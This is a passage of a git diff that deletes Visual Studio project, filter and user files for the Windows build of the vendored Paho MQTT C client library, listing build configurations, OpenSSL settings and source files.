-    <ClCompile Include="..\..\src\MQTTProtocolClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTVersion.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Socket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SocketBuffer.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SSLSocket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\StackTrace.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Thread.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Tree.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTAsync.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\Clients.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\utf-8.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Heap.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\LinkedList.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Log.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Messages.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacketOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocol.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Socket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SocketBuffer.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SSLSocket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\StackTrace.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\paho-mqtt3c\stdafx.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\paho-mqtt3c\targetver.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Thread.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Tree.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.user
deleted file mode 100644
index ace9a86..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.user
+++ /dev/null
@@ -1,3 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj
deleted file mode 100644
index cfa98a1..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj
+++ /dev/null
@@ -1,204 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{DEF21D1B-CB65-4A78-805F-CF421249EB83}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>pahomqtt3as</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>false</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>false</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\Clients.h" />
-    <ClInclude Include="..\..\src\Heap.h" />
-    <ClInclude Include="..\..\src\LinkedList.h" />
-    <ClInclude Include="..\..\src\Log.h" />
-    <ClInclude Include="..\..\src\Messages.h" />
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClient.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-    <ClInclude Include="..\..\src\MQTTPacket.h" />
-    <ClInclude Include="..\..\src\MQTTPacketOut.h" />
-    <ClInclude Include="..\..\src\MQTTPersistence.h" />
-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h" />
-    <ClInclude Include="..\..\src\MQTTProtocol.h" />
-    <ClInclude Include="..\..\src\MQTTProtocolClient.h" />
-    <ClInclude Include="..\..\src\MQTTProtocolOut.h" />
-    <ClInclude Include="..\..\src\Socket.h" />
-    <ClInclude Include="..\..\src\SocketBuffer.h" />
-    <ClInclude Include="..\..\src\SSLSocket.h" />
-    <ClInclude Include="..\..\src\StackTrace.h" />
-    <ClInclude Include="..\..\src\Thread.h" />
-    <ClInclude Include="..\..\src\Tree.h" />
-    <ClInclude Include="..\..\src\utf-8.h" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c" />
-    <ClCompile Include="..\..\src\Heap.c" />
-    <ClCompile Include="..\..\src\LinkedList.c" />
-    <ClCompile Include="..\..\src\Log.c" />
-    <ClCompile Include="..\..\src\Messages.c" />
-    <ClCompile Include="..\..\src\MQTTAsync.c" />
-    <ClCompile Include="..\..\src\MQTTPacket.c" />
-    <ClCompile Include="..\..\src\MQTTPacketOut.c" />
-    <ClCompile Include="..\..\src\MQTTPersistence.c" />
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c" />
-    <ClCompile Include="..\..\src\MQTTVersion.c" />
-    <ClCompile Include="..\..\src\Socket.c" />
-    <ClCompile Include="..\..\src\SocketBuffer.c" />
-    <ClCompile Include="..\..\src\SSLSocket.c" />
-    <ClCompile Include="..\..\src\StackTrace.c" />
-    <ClCompile Include="..\..\src\Thread.c" />
-    <ClCompile Include="..\..\src\Tree.c" />
-    <ClCompile Include="..\..\src\utf-8.c" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.filters
deleted file mode 100644
index 87d749a..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.filters
+++ /dev/null
@@ -1,147 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\Clients.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Heap.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\LinkedList.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Log.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Messages.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacketOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocol.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Socket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SocketBuffer.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SSLSocket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\StackTrace.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Thread.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Tree.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\utf-8.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Heap.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\LinkedList.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Log.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Messages.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTAsync.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacketOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistence.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTVersion.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Socket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SocketBuffer.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SSLSocket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\StackTrace.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Thread.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Tree.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\utf-8.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.user
deleted file mode 100644
index ef5ff2a..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.user
+++ /dev/null
@@ -1,4 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <PropertyGroup />
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj
deleted file mode 100644
index 9461788..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj
+++ /dev/null
@@ -1,172 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{172F8995-C780-44A1-996C-C7949B4DB35A}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>pahomqtt3c</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3C_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
